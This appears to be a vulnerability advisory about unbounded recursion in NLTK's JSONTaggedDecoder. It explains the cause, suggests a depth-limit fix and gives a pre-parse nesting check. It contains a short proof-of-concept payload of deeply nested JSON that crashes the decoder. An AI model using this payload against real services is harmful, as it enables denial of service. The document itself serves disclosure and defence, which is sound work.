Improper resource allocation in nltk

Description

The Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj(), which may cause a denial of service (DoS).

Summary

JSONTaggedDecoder.decode_obj() in nltk/jsontags.py calls itself recursively without any depth limit. A JSON structure nested more deeply than sys.getrecursionlimit() (default: 1000) raises a RecursionError; if the caller does not catch it, the Python process crashes.

Affected code

File: nltk/jsontags.py, lines 47–52

@classmethod
def decode_obj(cls, obj):
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val) for val in obj)
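
The recursion pattern in the excerpt can be reproduced without NLTK installed. The sketch below is a stand-in, not the library's code: decode_like, build_nested, and overflows are hypothetical names, the tagged-object handling is left out, and the nested input is built iteratively so that only the stand-in decoder recurses.

```python
import sys


def decode_like(obj):
    """Stand-in that mirrors the recursive shape of the excerpt (no tag handling)."""
    if isinstance(obj, dict):
        obj = {key: decode_like(val) for key, val in obj.items()}
    elif isinstance(obj, list):
        obj = [decode_like(val) for val in obj]
    return obj


def build_nested(depth):
    """Build {"x": {"x": ... None}} with a loop, so construction never recurses."""
    obj = None
    for _ in range(depth):
        obj = {"x": obj}
    return obj


def overflows(depth):
    """Return True if decoding an object nested `depth` levels hits the recursion limit."""
    try:
        decode_like(build_nested(depth))
    except RecursionError:
        return True
    return False


if __name__ == "__main__":
    print(overflows(10))                            # shallow input
    print(overflows(sys.getrecursionlimit() + 50))  # nesting beyond the limit
```

Each nesting level costs at least one Python stack frame, so the attacker controls stack usage through nesting depth alone.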

Proof of Concept

import sys, json
from nltk.jsontags import JSONTaggedDecoder

depth = sys.getrecursionlimit() + 50  # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth

# Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)...

Impact

Any code path that passes externally-supplied JSON to JSONTaggedDecoder is vulnerable to denial of service. The severity depends on whether such a path exists in the calling code (e.g. nltk/data.py).
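
Until a patched release is available, a caller that must accept untrusted JSON could reject over-nested input before it reaches any decoder. The following is a minimal sketch of that idea, not an NLTK feature: json_nesting_depth, is_depth_acceptable, and the MAX_DEPTH value of 100 are assumptions chosen for illustration. It scans the raw text rather than the parsed object, so it uses no recursion itself.

```python
MAX_DEPTH = 100  # assumed limit for illustration; tune to the application's data


def json_nesting_depth(text):
    """Return the maximum bracket nesting depth of a JSON text.

    Brackets inside string literals are ignored, including after escaped quotes.
    This is a depth estimate only; it does not validate the JSON.
    """
    depth = 0
    max_depth = 0
    in_string = False
    escaped = False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False      # character after a backslash is literal
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in "{[":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch in "}]":
            depth -= 1
    return max_depth


def is_depth_acceptable(text, limit=MAX_DEPTH):
    """Return True if the JSON text nests no deeper than `limit`."""
    return json_nesting_depth(text) <= limit


if __name__ == "__main__":
    hostile = '{"x":' * 1050 + "null" + "}" * 1050
    print(is_depth_acceptable(hostile))
    print(is_depth_acceptable('{"x": [1, 2]}'))
```

A caller would run this check first and only hand accepted text to json.loads. Catching RecursionError around the decode call is a complementary safeguard.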

Suggested Fix

Add a depth parameter with a hard limit:

@classmethod
def decode_obj(cls, obj, _depth=0):
    if _depth > 100:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val, _depth + 1) 
               for (key, val) in obj.items()}
    elif isinstance(obj, list):...
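
Since the excerpt above is truncated, here is a self-contained sketch of the same depth-limiting idea as a plain function. It is an illustration under assumptions, not the upstream patch: decode_obj_limited and nested are hypothetical names, the limit of 100 is taken from the suggested fix, and NLTK's tagged-object handling is omitted.

```python
MAX_DEPTH = 100  # same hard limit as in the suggested fix


def decode_obj_limited(obj, _depth=0):
    """Recursively walk dicts and lists, refusing input nested beyond MAX_DEPTH."""
    if _depth > MAX_DEPTH:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        return {key: decode_obj_limited(val, _depth + 1) for key, val in obj.items()}
    if isinstance(obj, list):
        return [decode_obj_limited(val, _depth + 1) for val in obj]
    return obj  # scalars pass through unchanged


def nested(levels):
    """Build a dict nested `levels` deep without recursing."""
    obj = None
    for _ in range(levels):
        obj = {"x": obj}
    return obj


if __name__ == "__main__":
    decode_obj_limited(nested(100))      # within the limit
    try:
        decode_obj_limited(nested(5000))
    except ValueError as exc:
        print("rejected:", exc)
```

Because the check fires once the depth counter passes 100, the walk stops long before the interpreter's recursion limit, and the caller sees a ValueError it can handle instead of a RecursionError.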

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
